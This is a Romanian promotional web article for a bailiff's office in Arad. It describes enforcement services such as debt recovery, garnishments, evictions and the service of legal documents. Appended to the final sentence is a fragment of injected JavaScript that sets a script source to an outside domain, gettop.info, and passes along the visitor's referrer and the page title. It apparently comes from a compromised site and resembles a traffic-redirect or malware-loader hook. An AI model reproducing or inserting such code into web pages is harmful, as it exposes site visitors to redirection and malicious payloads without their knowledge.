527c4619bd4dc0d99d8e2e34b9082b0dMai inainte de toate, pentru o intelegere mai usoara, trebui sa expunem pe scurt raspunsul la intrebarea: “Ce este un birou executor judecatoresc ?”. Prin urmare, un birou executor judecatoresc este acel loc unde, indiferent de natura juridica a problemei cu care te confrunti, vei beneficia de solutii profesionale si prompte care te vor ajuta sa scapi intr-un timp cat mai scurt de toate neintelegerile ce pot aparea in situatii foarte diverse.

Solicitarea serviciilor unui birou executor judecatoresc este posibila indiferent daca te confrunti cu situatia de a recupera niste bani, de a-ti recupera datoria prin procedura de executare directa a debitorului sau doar pentru a intocmirea unor procese verbale care sa fie in acord cu legislatia aflaa in vigoare. Fara indoiala, apeland la serviciile unor persoane compentente, vei beneficia de o colaboarare eficienta si bazata pe seriozitate si profesionalism.

Cel mai important aspect al unui birou executor judecatoresc este ca aici vei putea beneficia de sprijinul de incredere al unor persoane care te vor ajuta sa iti rezolvi toate probelemele.

Ce activitati sunt desfasurate in cadrul unui birou executor judecatoresc?

Un birou executor judecatoresc te intampina cu o varietate de servicii ce presupun efectuarea unor procedee specifice acestui domeniu. O parte din activitatile importante desfasurate aici sunt urmatoarele:

– notificarea actelor extrajudiciare si judiciare

– comunicarea actelor de procedura

– executarea dispozitiilor cu caracter civil in ceea ce priveste titlurile executorii

– sprijin de specialitate in recuperarea creantelor pe cale amiabila

– confiscari

– procese verbale

– popriri

– consultatii

– constatari

– protest de neplata, cecuri sau bilete de ordin

– aplicarea masurilor asiguratorii ce au fost dispuse de instanta judecatoreasca

Pentru servicii de calitate, apeleaza la Birou Executor Judecatoresc Pasculescu Horia

Biroul executor judecatoresc Pasculescu Horia este situat in Arad si poate fi contactat oricand pentru solutionarea unor probleme diverse. Personalul de aici se va ocupa cu profesionalism de situatii precum: executarea dispozitiilor cu caracter civil din titlurile executorii, executari directe (puneri in posesie, evacuari etc.), executari indirecte (urmarirea imobiliara si mobiliara a creantelor), notificarea actelor judiciare/extrajudiciare etc. Competenta teritoriala a acestui birou executor judecatoresc se intinde pe tot cuprinsul judetului Arad. De asemeni, in vederea obtinerii celor mai bune rezultate, acest birou colaboreaza doar cu persoane ce sunt calificate in domeniu, cu experienta si care manifesta interes constant in a gasi solutiile cele mai bune.

Activitatea desfasurata in cadrul acesti birou executor judecatoresc urmeaza anumite principii foarte importante in a conferi clientilor o colaborare bazata pe seriozitate si incredere. Toate informatiile sunt furnizate in conditii de confidentialitate, procesarea acestora se desfasoara intr-un ritm alert, iar profesionalismul se regaseste in cazul oricarei situatii. Preturile serviciilor oferite de acest birou sunt foarte accesibile si, in acest fel, pe viitor, veti continua sa fiti interesat in a solictita sprijinul acestui birou executor judecatoresc.

Una peste alta, dupa cum poti observa, se merita sa colaborezi cu echipa de specialisti din cadrul biroului executor judecatoresc Pasculescu Horia. Solicita serviciile acestui birou fie prin e-mai, fie prin intermediul telefonului si beneficiaza de profesionalism si seriozitate. Cu ajutor de specialitate, probeleme tale si-au gasit rezolvarea perfecta!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;